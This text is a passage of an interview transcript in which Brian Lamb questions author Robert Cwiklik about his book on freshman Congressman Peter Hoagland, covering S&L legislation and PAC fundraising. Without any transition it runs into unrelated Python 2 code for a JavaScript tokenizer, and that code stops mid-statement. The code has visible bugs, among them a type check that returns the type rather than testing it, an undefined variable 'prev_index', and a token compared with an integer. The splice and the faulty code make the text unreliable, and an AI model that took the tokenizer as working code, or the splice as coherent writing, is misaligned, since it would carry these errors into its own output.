think that's typical, especially in an office where there's a real dogfight expected in the next election. They want to keep the finger on the pulse. They actually had the newspaper faxed to the office twice a day, good chunks of it -- the morning edition and the evening edition. LAMB: You pointed out in your book that that was expensive? CWIKLIK: Well, I'm sort of speculating on that. It seems like an expensive way to read the paper, to get it faxed over the phone line. But then again, you know, you've got to wait, I guess, about a week to get it, so if you really need it. LAMB: But you said Congressman Hoagland was rather frugal. CWIKLIK: I did, didn't I? I guess there was an inconsistency there. LAMB: ...and wrap it up and keep it. CWIKLIK: ...personally was. I mean, that sort of ran through his whole method of operation. He himself was personally very frugal, and he personally didn't really enjoy self-aggrandizement. He didn't like people calling him "Congressman," and he didn't like wearing -- you know those lapel pins that members are walking around with that identify them? He didn't like wearing that. He thought that was sort of bragging. LAMB: How long were you around him? CWIKLIK: It was several months. From March pretty much till the end of the year. And I stopped back now and then in '90 to tie up loose ends. LAMB: And when you were there around him, was it every day? CWIKLIK: No. It was, as I say, for certain periods, if something was coming up, if something was coming to the floor or there were hearings on something, I would hang around intensely for three or four days. And then if things died down, I might back off and not show up for a few days. LAMB: There are a lot of things in the book that we could talk about, but a couple of the people from Nebraska I want to ask you about, because there are incidents in his congressional life that you write about. A fellow by the name of Larry King. Who was he? And what role did he play? CWIKLIK: Well, Larry King was -- he ran a credit union back in Omaha, which gained some notoriety when it was discovered that he was basically running it into the ground. It was thought that he was this sort of model of a black entrepreneur. He was sort of wined and dined by the Republicans as the kind of figure that would lead blacks back into the party because he was such a successful entrepreneur, picking himself up by his bootstraps sort of thing. But then it was found out that he had basically robbed -- I think it was something like $30 million from this credit union; and wild fits of, you know, cocaine using and, you know, all manner of things that are not looked upon favorably in Omaha. And it was viewed then as kind of a minor S&L debacle. I mean, it was sort of a little sideshow. It reflected a lot of the things that were going on in the the S&Ls around the country. LAMB: And how did Mr. Hoagland relate to that? CWIKLIK: Well, when he got on the Banking Committee, it enabled him to kind of take a more public posture on this Franklin affair, which was getting a lot of attention back in Omaha. I mean, it was just non-stop front-page news and 6:00 news. So if -- the Banking Committee's jurisdiction included credit unions, so to be on that committee meant that he would be suddenly a voice in this entire affair. LAMB: How did he get on the Banking Committee in the first place? CWIKLIK: Well, as I understand it -- I wasn't around then. But as I understand it, he and his chief of staff, first of all, visited with John Mack, who at the time was the chief of staff to the speaker -- who at the time was Jim Wright. These things have all changed. I don't really know what you say and how you go about, you know, convincing somebody that you should be the one to get the support in the end. But Dan Glickman, who is from the neighboring state of Kansas, went in there and basically made the case that Nebraska was a banking center and that it deserved a voice. But what really put him over the top was when the vote was tied. It looked like Jim Wright voted to put him over the top, so I don't know. That was all kind of murky and vague, and I'm not sure how he got on there. But that -- something in there may have had something to do with it. LAMB: Did he do anyting when he first came to Congress in 1989 to begin the process of getting to know people in the party -- anything special? CWIKLIK: Well, as far as I remember after he'd go to the floor for a vote, he'd actually go back to his office and read up on members that he'd seen or shook -- shaken hands with in these almanacs, you know, that are everywhere, "Politics in America" or there's another one; I forget the name of it. He'd go up and he'd look at the person's picture and read the little biographical section and try to memorize heir name. And it was, you know, that's sort of a job coming into a place with 435 people. LAMB: Did he take you on the floor with him? CWIKLIK: No, I couldn't do that. I didn't have -- I wasn't a staff member, so I didn't have any -- even, you know, most staff members aren't allowed on the floor; you need a special sort of status. LAMB: Did you sit up in the gallery and look down when he was on the floor? CWIKLIK: Yeah, I would stand in the press gallery. LAMB: Did you go back to the district with him? And did you travel with him when he would go back there? CWIKLIK: I went back to the district twice. And I guess I traveled -- I went back with him when he was conducting Town Hall meetings and went to quite a few of those. LAMB: What was his staff like? How big was his staff? What was the allowance allowed for his office to pay for the staff? LAMB: Did you get some sense of why he went into politics in the first place? CWIKLIK: Well, I took him at his word. You know, he said that he believed that politics -- for him, politics was like going into the priesthood was for others. He believed that it was a way to give something back. And I see no reason to doubt that. LAMB: Talk about -- the last chapter is about the pink house. Talk about the difference between living in Omaha and Washington. What's the difference in the price of homes? CWIKLIK: Well, for what they spend here in Washington, I guess $400,000, they tell me that you can buy a mansion in Nebraska for that. I didn't price homes in Nebraska, but it sounds reasonable to me. LAMB: But he was living in a hundred-thousand-dollar home before he moved here. CWIKLIK: Yeah. It was quite a nice neighborhood -- you know, nice little red brick house, and much bigger than the one they ended up with here. LAMB: And did they buy a particular -- I mean, you say the daughter wanted a pink house, and they ended up living in a pink house? CWIKLIK: Yeah, that was very strange. When it became obvious that they were going to buy a house in Washington, his daughter Katy -- out of nowhere, I guess -- just said, "Look, Daddy, I really love the color pink. I want a pink house."And, you know, he very gently told her, "Well, you know, that would be very nice, but you don't find many pink houses, you know. They're not very common." And the only house that -- they wanted to live in this one particular neighborhood in Chevy Chase so that they could send the kids to the Somerset Elementary School, which is a real hotshot elementary school. So the only house that they could even consider -- you know, get near to affording was this, you know, stucco and brick monster, which was painted pink. And it still is pink, as I understand. I may be wrong. LAMB: Now did you say that he lived worse here in Washington for $400,000 for his house than he did in Nebraska for $100,000? CWIKLIK: It sure looked like it. I mean, this was a sort of a three-bedroom. It didn't look like there were -- and it was just a lot smaller and a lot more cramped. And the layout was kind of funny. LAMB: Did he let you in his home here? CWIKLIK: Yeah, I went up there once. LAMB: And what about his family? Where did he meet his wife? How long have they been married? CWIKLIK: He met his wife in the Washington office of the public defender. I believe that she was a secretary there at the time. She eventually went to law school, too. CWIKLIK: Yeah. I think they now have five kids. And he has had one since he came to Washington. LAMB: And what did he do before he got into politics in Nebraska? CWIKLIK: Well, there wasn't that much time to do anything, because he left out of high school, he went away to school. And when he got back, I think he fairly quickly got into politics. This was after Yale and after working in Washington as a public defender. He went home and began working immediately for campaigns, and he organized a ballot initiative to get Sunshine Laws passed in the Legislature, which was very successful. So he pretty much leaped right in. LAMB: He was elected to the unicameral Legislature -- the only state in the union that has that? CWIKLIK: Right, in 1978. And the entire unicameral Legislature in Nebraska, I think, has 49 members. And the House Banking Committee has 51 members. So that's quite a culture shock there. LAMB: You say he spent his own money to run for the House of Representatives. CWIKLIK: Yeah. Well, he loaned his campaign something like $250,000. It may have been more. And I thought it was kind of curious that, under the rules that currently govern the system, he can now -- or he did, after he was in office -- he could go to PACs and raise money from them to retire the debt to himself. So basically, the money was coming straight to him. And it was entirely legal. You know, I don't mean to suggest there was anything illegal about it. It just seemed kind of funny to me. LAMB: You wrote that he couldn't raise money from his office in the Capitol, or in the Rayburn Building, or wherever -- where was his office located? CWIKLIK: He was in Longworth. LAMB: Longworth, looking back over the power plants. LAMB: But he had to go to the Democratic Congressional Campaign Committee in a booth? CWIKLIK: Yeah, they have -- it's a very convenient -- I've heard it described as an `ethics-free zone' over there. It's a couple of blocks down from Longworth. And you can go in there -- it's a good place to rush over to. It's easy to, like, run over there in between votes or in between meetings and put in 10 or 20 calls. LAMB: Who does he call? LAMB: And did he take you with him to show you how it's done? CWIKLIK: Yes. I went with him. I did that once. And he didn't seem very eager for me to be there. It's just one of those things that they're none too comfortable about, I get the sense. CWIKLIK: I did ask him about that. I didn't ask him about it specifically in relation to his campaign loan. Frankly, it just didn't occur to me. I was so -- I was pretty boggled by this whole system. And that connection didn't occur to me until much later. But I did ask him why he called banking PACs and not others, and he said that he didn't call PACs that didn't have an interest in the legislation before his committee, which seemed to me to be saying, "We only offer our merchandise to those who want to buy it." And it sounded sort of fishy. CWIKLIK: No, not at all. LAMB: ... from what the others do? CWIKLIK: No, no. Certainly not. LAMB: And everything he did was legal? CWIKLIK: I think it's obvious from the way they shy away from doing this out in the open. LAMB: This is what the book looks like. It's called "House Rules," written by Robert Cwiklik. And we're talking about Congressman Peter Hoagland, a Democrat from Omaha, Nebraska, in his second term. But you followed him around for the better part of a year of his first term. CWIKLIK: I'm from Pennsylvania originally, and I grew up in upstate New York. CWIKLIK: I studied political science. CWIKLIK: That's a very good question -- I think it was in 1978. LAMB: What did you do after that? CWIKLIK: After that, I was briefly a teacher, and then I became a free-lance writer. And here I am. LAMB: In this book, you refer often -- and I wrote it down -- on page 93 to a "festival of flattery." And as you describe what that is, I'll see if I can find a quote from you. CWIKLIK: I think I remember one -- I mean, you've seen enoughhearings on the Hill to know that it's just common coin here for members of Congress to inject a lot of foam into their remarks. The "most fastidious, most competent, most diligent, most hardworking gentleman from Louisiana." LAMB: Let me read from page 154. And this is, on June the 15th, Congressman Hoagland, quoting, "'I appreciate our illustrious chairman of the full Banking Committee yielding,' that's Henry Gonzalez, 'yielding time to me and appreciate his gracious handling of those complex issues in committee and now on the floor,'" unquote. "Hoagland enthused, and he was warming up." You go on to quote him, "It is a great pleasure to serve with the gentleman from Texas. He has done the nation and our Congress proud with his handling of this bill." LAMB: You refer to that often. Was that irritating? LAMB: Why is it amusing? CWIKLIK: ... I don't know. Why amusing? Well, ironic, I guess, would be another way to put it. A couple of weeks later, after Mr. Hoagland sort of basted his committee chairman in that fashion, he basically turned on him on the floor and voted against his position on the bill in a very public way. So it just seems to be a lot of frosting. LAMB: Is it hard for a freshman member to vote against his chairman? LAMB: There is a -- and you correct me if I'm wrong -- there is a gentleman from Nebraska by the name of Janne? LAMB: Mike Janne from Omaha, Nebraska? CWIKLIK: Well, I guess you'd call him a financier. He owns a thing called America First Corporation, which puts together packages of investments for people to join in on. And he acts as the sort of general partner that manages the investments. And he put together groups to buy a couple of savings and loans. And at one point, the bailout bill made it -- it was sort of a complicated provision, but basically it made one group of investors liable for the losses of another group of investors, though they had virtually no common links other than the fact that Janne sat at the same table with both of them. And the one amendment that Congressman Hoagland was able to get in, with the help of his committee chairman, was benefiting Mike Janne back in Omaha. LAMB: If we can, let's try to go through that in detail. Was Mike Janne a Democrat? CWIKLIK: No, he was a Republican. And, in fact, Congressman Hoagland went to him for support before the election and got nowhere. But then once he got into office, as so often happens, Mike Janne decided -- or through his PAC -- I guess he controlled a PAC back there -- to donate $5,000 to the newly elected congressman. So things changed. And you send your money with the winner. CWIKLIK: He was the controlling partner in two different groups, or consortia, of investors. And that link alone was enough, according to the original draft of the bailout bill, to make each consortia responsible should the other lose money. LAMB: Who came to Congressman Hoagland first to try to rectify the situation? CWIKLIK: Well, I believe it was -- I'm not sure on this -- but I believe it was a former congressman from Omaha, John Cavanaugh, who was working for -- or he was associated with a law firm that Mike Janne did a lot of business with. LAMB: John Cavanaugh, the same congressman, a Democrat, who had quit Congress for what reason? CWIKLIK: Well, he said he wanted to spend a lot more time with his family. He quit at a fairly young age. I can't remember. I think he was -- he looked young. I don't know how old he was -- maybe 40 or something. LAMB: So he brought the idea of a special amendment to Mr. Hoagland. LAMB: What did he do with it then? CWIKLIK: Well, unlike a lot of offices, where the amendment might have gone through the staff and bubbled up to the congressman and gotten pretty thoroughly discussed along the way, Congressman Hoagland basically looked it over and said, "Yeah, fine. That's good public policy." And he admitted that he also saw it as a way to build a bridge to the business community back in Omaha. He didn't have much support from them, and Mike Janne could deliver that kind of support. So it looked good on the merits and it looked good politically. So he decided to go with it. And he didn't bother consulting anybody on his staff. And when they found out about it, a couple of them were pretty outraged because this was clearly a case where, if you wanted to get nasty, you could easily say that here he is, becoming a slave to special interests. And taking campaign money and introducing amendments -- what has he come to, this freshman congressman? And that's exactly what happened when The Wall Street Journal printed an editorial just bashing him. It landed on him with both feet and said that he had -- I think the title of it was Congressional Crack. And basically accused Congressman Hoagland and several other people of not being able to resist the addiction to special interest money and special favors for those who deliver it. LAMB: How can an editorial in The Wall Street Journal hurt somebody in Omaha, Nebraska? CWIKLIK: I don't know if it did, but it certainly scared them. I mean, the day after it appeared, I was in his office and he told me that he couldn't sleep all night. He said he was tossing and turning and just thinking about it all night, that it really got to him. I think the fear is that, you know, in the next election, somebody's going to take that out and take a picture of it and put it in a video machine make a 30-second spot out of it, saying, "The Wall Street Journal says Peter Hoagland is addicted to congressional crack," or something like that -- you know, one of these brilliant pieces. And they're very afraid of things like that. LAMB: At some point, had the Omaha World Herald picked up on that editorial and written a local story on it? CWIKLIK: Yeah, they did a piece on it. Basically a "he said thing." But when Congressman Hoagland went to them and explained the merits of the Janne amendment, I think they pretty much dropped the story. LAMB: Did the Janne amendment ever become law? CWIKLIK: Yes. It was in the final version of the S&L bill. LAMB: Was it hard to keep it in the final version? CWIKLIK: Well, that was another thing. I mean, after he got beaten up by The Wall Street Journal on this amendment, it came to the floor when the House acted on the S&L bill for the first time. And this was a season when special interests were sort of the main topic of discussion. And Congressman Leach offered a motion to recommit the bill, just before -- it was just on the lip of final or of preliminary passage in the House. And just before that, he offered a motion to recommit, which is a very rare motion. It hardly ever succeeds. And it specified that -- to recommit the bill to the Banking Committee and tear out all the special interest provisions. And it just sort of caught fire in the House that night. And I think it won by -- I mean, that's something you can't vote against. You know, you can't start say -- if you vote against that, you're saying, "Well, yeah, I like special interest legislation." So that lost big time, and Congressman Hoagland ended up voting against his own amendment that night. LAMB: You wrote about Congressman Walter Fauntroy and a prayer that you -- were you there in the room that day? CWIKLIK: No, I wasn't. Oh, wait. Yes, I think I was. I'm sorry. LAMB: And what was it about the prayer that got your attention? CWIKLIK: Well, there were, I think, two or three -- Congressman Fauntroy opened up the session of the S&L markups, which is when they decide what the final language of the legislation's going to be, and that's pretty much where you can -- usually, if you're a special interest, you can lose $10 million if a sentence is changed here or there. So people have their eyes open during that proceedings. And there's a large temptation for slipping favors into the bill that might not be noticed very easily. And Congressman Fauntroy said a prayer to open the proceedings. He said it was the first time he had done so in 20 years on the committee. I can't remember the exact words, but he basically said, "Look, you know, God help us not to give in to our baser impulses here." LAMB: There's a headline that you do print from The Washington Times that came as a result of this prayer that said, "Members say grace before digging in." CWIKLIK: Well, it was very ironic. Because right after he said this prayer -- boom, boom, you know, right -- one after another, special interest amendments came cropping up and were being voted on, and passing. And Congressman Fauntroy, I believe, had one of his own, or voted for them in any case. I can't remember. You're better situated to inform us on this point. LAMB: Let me ask you about what your reaction was as you're going through this thing. You had not spent much time covering Congress, you told us earlier. LAMB: Again, what were you thinking as you started seeing this process up close? CWIKLIK: Well, it seemed kind of funny to me, actually. A lot of these things just seemed to go on exactly as you hear about. I mean, it was almost like a caricature of what you see in the news. People, for instance, introducing amendments that they had received in the mail without hardly even reading, you know, just because someone had given them a certain amount of money, or at least presumably so. It didn't seem like there was much creativity involved, in any case. LAMB: Is the system honest? LAMB: Did you like what you saw? CWIKLIK: I think there is a lot of room for improvement. LAMB: Knowing what you know now, would you get into the game at any point? CWIKLIK: How do you mean? As a politician? CWIKLIK: No, I don't think I have the energy for it, for one. I mean, it just takes an incredible amount of stamina to even run for office, let alone serve there. And I think I would be -- if I were ever to do it, I would be the type that would fizzle out quickly. I'd come in and I'd just start shooting my mouth off and probably never -- I'd never get anybody to give me any money to run again. So I think that's how that works. LAMB: There's some odds and ends I want to ask you about. Quote from your book, "Late in the afternoon of the last day of full committee markups, a 5:00 shadowy mood settled over the room. While tiresome debates droned on, members eased back in their chairs, some reading papers or swilling beer." In the middle of a committee room, swilling beer? CWIKLIK: Yeah. There was one guy who was sitting back there drinking a beer. It was late. And it was really painful. I didn't blame him at all. LAMB: You also say that mess -- you found, during one of the markups, that you arrived at the door early in the morning and outside the committee room -- I don't know if I can say it correctly, but you -- it looked like a bunch of people at a Bon Jovi concert. I don't know if my quote's right, but explain that. CWIKLIK: Well, I guess, I'm sure you know that for years now, there's been a rule in the House that as often as not, hearings are open to the public, and there's a section reserved for the public. And for a popular -- well, popular might not be the right word -- but for a proceeding where there's a lot of interest, like the S&L markup, lines form early on to get those seats. So approaching the S&L committee room on days when these markups were happening, it was very strange to see these young people -- the teen-agers or very young people in, like, Spandex tights and T-shirts and sunglasses. And it looked for all the world like a Bon Jovi concert, not like Henry Gonzalez and the S&L Banking Committee -- or the House Banking Committee. What would happen then -- if you hung around long enough, you'd see this phalanx of limousines come pulling up and these lobbyists come piling out in their pinstripes and their Gucci shoes. And they would go up and take the place of the bike messengers, which is what these young people were. And they had been -- all been hired for anywhere from $10 to $30 an hour to just sort of hold the places in line, so that the public seats ended up being kind of like scalped for the lobbyists. CWIKLIK: Gary Caruso was Congressman Hoagland's communications director-press secretary. LAMB: Quote, "Gary" -- this is you writing this -- "Gary had seen members in Longworth hallways give one another thumbs up signs, gleefully predicting they'd get the money. Later, he saw some of the same members denouncing the raise on the House floor. They're such hypocrites, he said." CWIKLIK: That's what he said. LAMB: He said that to you. LAMB: You wrote that down. LAMB: Why? I mean, what was he talking about? CWIKLIK: Well, he was talking about the first time, in 1989, that the House -- there was a movement in the House trying to give itself a pay raise. And for a while, it looked as if it wouldn't even come to the floor for a vote. I guess -- you may recall that under the procedure that existed at that time, if they didn't vote on it, they would have gotten it automatically. But there was such an outcry from the public, that they were forced to take a vote. And of course, at the time, an overwhelming majority felt that voting for it was not an option. But during that time, Gary tells me that he saw members -- when it still seemed like the pay raise was going to come through, he saw members you know, slapping each other on the back saying, "Yeah, we're going to get it this time." And then he saw those same people going down to the floor, demanding a vote on this pay raise -- this outrageous pay raise, so that they could kill it. And he didn't quite admire that attitude. I didn't happen to be there, so I'm just reporting what he told me. LAMB: Your words again. "Throughout the day, tubes all over Capitol Hill -- Hill glow with C-SPAN's coverage of the House and Senate floor proceedings." LAMB: Let me continue -- "But members with schedules anything near as packed as Hoagland's seldom have time to sit back and watch. Their staffs have even less free time. So sets are left to drone in the background like video Muzak pumping legislative atmosphere to every corner of Congress." CWIKLIK: I didn't mean to suggest that nobody's watching. However, I think the way it works is, it's going on in the background, and then you perk up when something interesting bubbles up on the floor or in a hearing. But it's basically on non-stop, as far as I could see. LAMB: Do they have -- we really haven't gone through this, but what's a day like for Peter Hoagland? Did you follow him often from start to finish? CWIKLIK: Enough, but it often would start with an early morning issues group. He would meet with a health-care issues group, and they would talk about, I guess, legislation that was coming down the pike in the long term. And they would sort of invite guest speakers in from the administration or wherever, and talk about where things might be headed. He liked to do things like that. And then there might be a meeting of the Democratic caucus, which would -- that was kind of a highlight of the day because that got to be pretty raucous, though I couldn't get him to report verbatim very often on that. And when the House was in session -- generally, after the caucus, if the House was in session, he would have his series of appointments to attend to. He had a pretty full calendar of either lobbyists or constituents or officials from one place or another coming in to talk to him. LAMB: You mentioned that he is a very straitlaced type of individual. You also mentioned a couple of times that he drank soda water or whatever at some of these receptions. CWIKLIK: At a fund-raiser, I think that his drink of choice was club soda. LAMB: Do you get any sense of how much alcohol is consumed on Capitol Hill? CWIKLIK: Probably because I was traveling with Congressman Hoagland, it didn't seem to me like a hell of a lot was consumed. But that could be very wrong. I don't know. LAMB: You start off your book and you talk about Thomas Jefferson and Alexander Hamilton for a reason, and I'd like to have you set up that scene. CWIKLIK: Well, OK. Well, it seemed to me relevant, especially since there's been so much criticism of Washington and Congress of late, along the lines of, "Well, you know, nothing ever gets done in Washington, and Congress never seems to be able to do anything." And it seems clear, from looking at the history of the adoption of the Constitution, that that's exactly how the framers intended for the government to function -- or they basically wanted it to run like a jalopy. They didn't want the hot political winds to drive it in an efficient and fast-moving way. They thought that it would be healthier that it didn't move too quickly. And as a result, you have a president and a Senate and a House all elected on basically different agendas, all colliding with one another, and all these different points at which special interests can apply their pressure to block things or to get things that they want. But it's very hard for the majority -- all the people out there to come together in one place for one program. LAMB: Who's your favorite, Thomas Jefferson or Alexander Hamilton? CWIKLIK: Well, you know, you could certainly see, I think, the blend of the two was probably good for us back then because in a -- you know, the nation didn't have any money, we didn't have any army. To be going around with this sort of absolute democracy probably would have lasted about five years. But I think now there is enough -- you know, there's just enough communications media to get the message out to people. There's enough basis for building a fairly strong consensus on a lot of issues, that it might not be so dangerous to have more of a parliamentary system, to where a majority faction was encouraged to come together. And right now, it's very hard to form a majority point of view in this country, because there are so many different outlets. LAMB: You write on page 158, "One way politicians control the news agenda is when both parties stop talking about something. Then the press often won't talk about it either. Despite its vaunted aggressiveness, the press sometimes seems to have a yellow streak. It doesn't like to get out front on issues; it likes to follow the leader." CWIKLIK: Yes. Well, that was -- I think that was particularly true in the S&L matter in 1988. It was, I think, pretty widely known among politicians in Washington that there was something really rotten in the S&Ls, and that something just had to be done about it. But you really didn't hear very much, even though that was an election year. There was a presidential race that year and there was congressional campaigns. You hardly heard a peep about this S&L issue, even though it was a massive problem, and it was bound to cost hundreds of billions of dollars. And there was a reason for that. And Congressman Leach explained it to me. He said that basically the Democrats were just as guilty as the Republicans. Well, I think he thought the Democrats were more guilty, but we can leave that aside -- and that both parties basically decided to keep quiet about it. Now when that happens, reporters don't get their sources to come out in the open, and they basically would have to take it upon themselves to break it. And that doesn't happen as often as you'd like. A lot of the real big stories that you get are the result of leaks and officials coming out with something. LAMB: Do you intend to do any more on this subject? LAMB: You're finished with Congress? CWIKLIK: Well, I just finished writing a book for adolescents about Tecumseh, the famous Shawnee warrior, who led a revolution -- a failed revolution. I guess all the folks out in the Midwest know him well. LAMB: If you had this book to do over again, would you do it again? CWIKLIK: I think so. It was a learning experience. LAMB: What would you say you learned overall, besides what we've talked about? CWIKLIK: I think I learned just how boxed in members of Congress feel themselves to be. I think they feel that there's so much attention paid to the presidency and to sound bites. Congress doesn't mix with sound bites. They've got a need -- they need time to get out and let their sort of their imagination wander and get arguments out there that are fairly complicated. And it just doesn't happen. So they're often laboring in the shadows. And there's not much encouragement to come out in the open with a constructive program. LAMB: Do you think that an opponent -- and by the way, do you know whether Mr. Hoagland has an opponent? CWIKLIK: Not this year. I don't know. LAMB: But do you think an opponent would want this book as fodder against him? LAMB: Do you think his office is worried about that? CWIKLIK: Oh, have no doubt. But, you know, that's not to be avoided. That's going to happen. It's politics. LAMB: Do you think if they had a chance to do this again, would they let you in the door? CWIKLIK: No, I don't think so. CWIKLIK: Well, I think he feels now that it was a mistake. It didn't come out the way he wanted it to. But I guess you'd have to ask him. LAMB: Based on your experience of seeing Congressman Peter Hoagland up close, if you lived in Omaha and had the chance to vote for him, would you vote for him? CWIKLIK: I don't know if I'm ready to, you know, make an endorsement one way or another. I don't live in Omaha, so fortunately, I don't have to worry about making that decision. LAMB: Did you see anything that would bother you, besides what you've written here? I mean, is it all in the book? CWIKLIK: I think so, yeah. I think everything that's relevant is in there. LAMB: Our guest has been Robert Cwiklik. This is what the book looks like. It's called "House Rules." It's about a freshman congressman, Congressman Peter Hoagland, a Democrat, out of Omaha, Nebraska. And this book was written about his first year in 1989. Mr. Cwiklik, thank you for joining us. CWIKLIK: It's been a pleasure, Brian. Thank you.
import sys import os import exceptions import glob fileTypes = ['.js','.kl','.html'] controls = ['case', 'default', 'do', 'else','for', 'if','while','throw', 'switch', 'catch'] keywords = ['break', 'continue', 'finally', 'return', 'try', 'var', 'with', 'delete', 'new', 'typeof', 'instanceof', '#include'] functions = ['function', 'operator'] curly = ['{', '}'] brace = ['(', ')'] bracket = ['[', ']'] allbrackets = [] allbrackets.extend(curly) allbrackets.extend(brace) allbrackets.extend(bracket) quotes = ['"', "'"] whitespace = [' ', '\n'] comment = ['//', '/*', '*/'] semicolon = [';'] comma = [',','.'] unaoperators = ['++', '--', '>>', '<<'] binoperators = ['===', '!==', '<<=', '>>=', '+=', '-=', '/=', '*=', '%=', '||', '&&', '>=', '<=', '==', '!=', '^=', '&=', '|=', '+', '-', '/', '*', '%', '>', '<', ':', '?', '&', '^', '=', '!'] operators = [] operators.extend(unaoperators) operators.extend(binoperators) splitters = [] splitters.extend(comment) splitters.extend(comma) splitters.extend(semicolon) splitters.extend(allbrackets) splitters.extend(quotes) splitters.extend(whitespace) splitters.extend(operators) TYPE_CONTROL = 0 TYPE_KEYWORD = 1 TYPE_FUNCTION = 2 TYPE_CURLY = 4 TYPE_BRACE = 8 TYPE_BRACKET = 16 TYPE_ALL_BRACKETS = TYPE_CURLY | TYPE_BRACE | TYPE_BRACKET TYPE_QUOTE = 32 TYPE_WHITESPACE = 64 TYPE_COMMENT = 128 TYPE_NO_CODE = TYPE_WHITESPACE | TYPE_COMMENT TYPE_SEMICOLON = 256 TYPE_COMMA = 512 TYPE_BINOPERATOR = 1024 TYPE_UNAOPERATOR = 2048 TYPE_OPERATOR = TYPE_BINOPERATOR | TYPE_UNAOPERATOR TYPE_IDENTIFIER = 4096 class token(): string = '' type = '' index = -1 def __init__(self,string,type = TYPE_IDENTIFIER,index = 0): self.string = string self.type = type self.index = index def isTypeOf(self,type): return self.type def tokenize(content): # first some basic formatting content = content.replace('\t',' ') # get all of the words words = [] while len(content) > 0: minSplitIndex = len(content) minSplitter = '' for i in range(len(splitters)): split = content.partition(splitters[i]) if len(split[1]) > 0: if len(split[0]) < minSplitIndex: minSplitIndex = len(split[0]) minSplitter = splitters[i] if minSplitIndex == len(content): words.append(content) content = '' else: split = content.partition(minSplitter) if len(split[0]) > 0: words.append(split[0]) words.append(split[1]) content = split[2] # parse the words to tokens tokens = [] for word in words: tokenIdentified = False if not tokenIdentified: for i in range(len(controls)): if(word == controls[i]): tokenIdentified = True tokens.append(token(word,TYPE_CONTROL,i)) break if not tokenIdentified: for i in range(len(keywords)): if(word == keywords[i]): tokenIdentified = True tokens.append(token(word,TYPE_KEYWORD,i)) break if not tokenIdentified: for i in range(len(functions)): if(word == functions[i]): tokenIdentified = True tokens.append(token(word,TYPE_FUNCTION,i)) break if not tokenIdentified: for i in range(len(curly)): if(word == curly[i]): tokenIdentified = True tokens.append(token(word,TYPE_CURLY,i)) break if not tokenIdentified: for i in range(len(brace)): if(word == brace[i]): tokenIdentified = True tokens.append(token(word,TYPE_BRACE,i)) break if not tokenIdentified: for i in range(len(bracket)): if(word == bracket[i]): tokenIdentified = True tokens.append(token(word,TYPE_BRACKET,i)) break if not tokenIdentified: for i in range(len(quotes)): if(word == quotes[i]): tokenIdentified = True tokens.append(token(word,TYPE_QUOTE,i)) break if not tokenIdentified: for i in range(len(whitespace)): if(word == whitespace[i]): tokenIdentified = True tokens.append(token(word,TYPE_WHITESPACE,i)) break if not tokenIdentified: for i in range(len(comment)): if(word == comment[i]): tokenIdentified = True tokens.append(token(word,TYPE_COMMENT,i)) break if not tokenIdentified: for i in range(len(semicolon)): if(word == semicolon[i]): tokenIdentified = True tokens.append(token(word,TYPE_SEMICOLON,i)) break if not tokenIdentified: for i in range(len(comma)): if(word == comma[i]): tokenIdentified = True tokens.append(token(word,TYPE_COMMA,i)) break if not tokenIdentified: for i in range(len(binoperators)): if(word == binoperators[i]): tokenIdentified = True tokens.append(token(word,TYPE_BINOPERATOR,i)) break if not tokenIdentified: for i in range(len(unaoperators)): if(word == unaoperators[i]): tokenIdentified = True tokens.append(token(word,TYPE_UNAOPERATOR,i)) break if not tokenIdentified: tokenIdentified = True tokens.append(token(word,TYPE_IDENTIFIER,0)) # now since we know the tokens, let's simply some of them # simplify the comment tokens into single tokens newTokens = [] lastToken = False for i in range(len(tokens)): if(lastToken): if(lastToken.index == 0): if(tokens[i].type == TYPE_WHITESPACE and tokens[i].index == 1): newTokens.append(lastToken) newTokens.append(tokens[i]) lastToken = False else: lastToken.string += tokens[i].string; elif(lastToken.index == 1): lastToken.string += tokens[i].string; if(tokens[i].type == TYPE_COMMENT and tokens[i].index == 2): newTokens.append(lastToken) lastToken = False elif(tokens[i].type == TYPE_COMMENT): lastToken = tokens[i] else: newTokens.append(tokens[i]) if(lastToken): newTokens.append(lastToken) tokens = newTokens # simplify the string tokens into single tokens newTokens = [] lastToken = False for i in range(len(tokens)): if(lastToken): if(tokens[i].type == TYPE_QUOTE): if(tokens[i].index == lastToken.index): lastToken.string += "'" newTokens.append(lastToken) lastToken = False else: lastToken.string += '"' else: lastToken.string += tokens[i].string elif(tokens[i].type == TYPE_QUOTE): lastToken = tokens[i] lastToken.string = "'" # prefer singles else: newTokens.append(tokens[i]) if(lastToken): newTokens.append(lastToken) tokens = newTokens # simplify the numeric tokens into single tokens newTokens = [] lastToken = False for i in range(len(tokens)-1): if(lastToken): if(tokens[i].type == TYPE_IDENTIFIER): if(tokens[i].string == 'e' and lastToken.string.find('e') == -1): lastToken.string += tokens[i].string; else: try: intvalue = int(tokens[i].string[0:1]) lastToken.string += tokens[i].string; except Exception: newTokens.append(lastToken) newTokens.append(tokens[i]) lastToken = False elif(tokens[i].type == TYPE_COMMA and tokens[i].index == 1 and lastToken.string.endswith('e')): lastToken.string += tokens[i].string; elif(tokens[i].type == TYPE_BINOPERATOR and tokens[i].string == '-' and tokens[i+1].type == TYPE_IDENTIFIER): try: intvalue = int(tokens[i+1].string[0:1]) lastToken.string += tokens[i].string; except Exception: newTokens.append(lastToken) newTokens.append(tokens[i]) lastToken = False else: newTokens.append(lastToken) newTokens.append(tokens[i]) lastToken = False elif(tokens[i].type == TYPE_IDENTIFIER): try: intvalue = int(tokens[i].string[0:1]) lastToken = tokens[i] except Exception: newTokens.append(tokens[i]) else: newTokens.append(tokens[i]) if(lastToken): newTokens.append(lastToken) newTokens.append(tokens[len(tokens)-1]) tokens = newTokens # simplify the regex tokens into single tokens newTokens = [] startIndex = -1 endIndex = -1 string = '' i = 0 while(i < len(tokens)): if(startIndex > -1): tkn = tokens[i]; if(not string.endswith("\\") and ( (tkn.type == TYPE_SEMICOLON) or (tkn.type == TYPE_BRACE and tkn.index == 1) or (tkn.type == TYPE_WHITESPACE and tkn == 0) )): if(endIndex > -1): string = '' for j in range(startIndex,endIndex+1): string += tokens[j].string newTokens.append(token(string)) i = endIndex else: i = startIndex newTokens.append(tokens[i]) startIndex = -1 endIndex = -1 string = '' elif(tkn.type == TYPE_BINOPERATOR and tkn.string == '/'): endIndex = i string += tkn.string else: string += tkn.string elif(i > 0 and tokens[i].type == TYPE_BINOPERATOR and tokens[i].string == '/'): # check if the previous is not an identifier, not an operator j = i-1 prev = tokens[j] while(prev.type == TYPE_WHITESPACE and j > 0): j -= 1 prev = tokens[j] if((prev.type == TYPE_BINOPERATOR and prev.string == '=') or (prev.type == TYPE_BRACE and prev.index == 0) or (prev.type == TYPE_COMMA and prev_index == 0)): startIndex = i string = tokens[i].string else: 